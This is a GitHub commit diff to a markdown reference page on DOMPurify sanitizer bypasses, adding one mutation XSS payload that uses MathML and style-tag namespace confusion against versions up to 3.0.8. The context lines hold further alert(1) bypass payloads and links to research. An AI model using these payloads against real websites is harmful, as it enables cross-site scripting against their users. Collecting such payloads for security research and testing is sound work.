add one paylaod

xanhacks · Apr 2, 2024 · 720f047 · 720f047
1 parent 9cafc5a
commit 720f047
Showing 1 changed file with 6 additions and 1 deletion.
diff --git a/content/docs/framework/dompurify.md b/content/docs/framework/dompurify.md
@@ -40,7 +40,7 @@ DOMPurify.sanitize('<UL><li><A HREF=//google.com>click</UL>'); // becomes <ul><l
 <![CDATA[ ><img src onerror=alert(1)> ]]>
 ```
 
-### Version 3.0.8
+### Version <= 3.0.8
 
 - [Playing with DOMPurify custom elements handling](https://mizu.re/post/playing-with-dompurify-ce-handling)
 
@@ -62,6 +62,11 @@ DOMPurify.sanitize('<UL><li><A HREF=//google.com>click</UL>'); // becomes <ul><l
 <!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">
 ```
 
+```xml
+<math><mtext><table><mglyph><style>
+<!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">
+```
+
 ### Version < 2.0.17
 
 - [Mutation XSS via namespace confusion](https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/)